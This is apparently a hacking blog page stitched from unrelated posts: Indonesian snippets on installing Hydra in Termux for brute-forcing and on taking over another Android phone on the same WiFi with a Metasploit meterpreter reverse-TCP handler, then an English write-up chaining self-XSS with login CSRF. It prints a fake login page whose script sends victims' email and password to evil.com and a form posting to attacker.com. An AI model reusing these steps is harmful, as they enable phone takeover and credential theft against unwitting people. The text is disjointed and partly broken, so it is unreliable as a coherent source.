Hacking & Tecnologi
Hydra adalah Alat yang Baik untuk Serangan Brute force, harap Anda mungkin sudah tahu tentang itu dan Anda mungkin tidak perlu info lebih lanjut tentang hydra
Untuk menginstal Hydra di Termux cukup ketik perintah
Pkg install Hydra
perlu beberapa menit untuk menginstal, setelah instalasi
Cukup ketik Hydra di Termux untuk mulai menggunakan termux
Halo guys, dalam tutorial ini kita akan membahas tentang cara hack Android dengan Metasploit di termux dengan android.
Jadi kita akan mencoba meretas Android lain dalam satu jaringan WiFi menggunakan Metasploit di termux.
Berikut ini adalah tutorial hack Android satu jaringan WiFi menggunakan Metasploit di aplikasi termux Android tanpa root:
1. Pertama, instal Metasploit framework di Android menggunakan aplikasi termux.
Silahkan baca artikel kami tentang cara instal Metasploit framework di termux.
2. Jalankan Metasploit.
Masukal perintah berikut ini untuk menjalankan Metasploit framework:
msfconsole
3. Buat aplikasi BackDoor menggunakan Metasploit.
Aplikasi BackDoor adalah aplikasi yang dapat di gunakan untuk menyadap android dari jarak jauh, untuk membuat BackDoor di termux menggunakan Metasploit silahkan ikuti tutorial cara membuat BackDoor di termux dalam panduan sebelumnya.
4. Kirim aplikasi BackDoor ke target yang akan kita hack Android nya menggunakan Metasploit.
Jika sudah, masukan perintah berikut ini untuk hack Android dalam satu jaringan WiFi:
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 8080
exploit
Metasploit juga bisa di gunakan untuk hack Android dari jarak jauh, beda jaringan menggunakan port forwading.
Itulah cara hack Android dalam satu jaringan menggunakan Metasploit di termux Android.
Hi guy I hope you all are fine this POC is all about how I convert the Self XSS To Evil XSS so let assume the site PRIVATE.COM
The first step simply sign-up and login to the account & start playing with the change account details functionality after some time I find out that the first name field is vulnerable to xss but the problem is this is self stored xss so I need to convert this xss to exploit other users I check the 1st method through CSRF but there is a CSRF token in the account update functionality so this method fail & then I remember GEEK BOY POC.
So simple created the html + js code to steal email & pass of victim.
<!DOCTYPE html>
<html>
<head>
<title>XSS</title>
</head>
<body><center>
Something Went Wrong Please Login Again
Password</div>
<button class=”action-button btn btn-primary login-button” buttontype=”login” type=”submit” onclick=”myFunction()”>Login</button>
</div>
function myFunction() {
var x = document.getElementById(“Vemail”).value;
var y = document.getElementById(“Vpass”).value;
var pwd = x + “:” + y;
alert(pwd);
window.location = “https://evil.com/” + pwd;
}</body>
</html>
This is a simple html code with 2 input fields with 1 button asking for Email and Password & the JS code simply get the input field value & send it to attacker server and upload the code the web host.
Simply use I frame to load the code from web host.
This is how i look like.
<html><body><form action="https://attacker.com/login/submit" method="POST"><input type="hidden" name="email" value="email@gmail.com" /><input type="hidden" name="password" value="password" /><input type="submit" value="Submit request" /></form></body></html>
This is simply make victim to login in my account without knowing him & when he login in my account he see the msg Something Went Wrong with input fields & try to login when he try the JS code simply get the email & pass victim enter and send it to attacker server
I hope you like it 🙂
./Logout
xss code 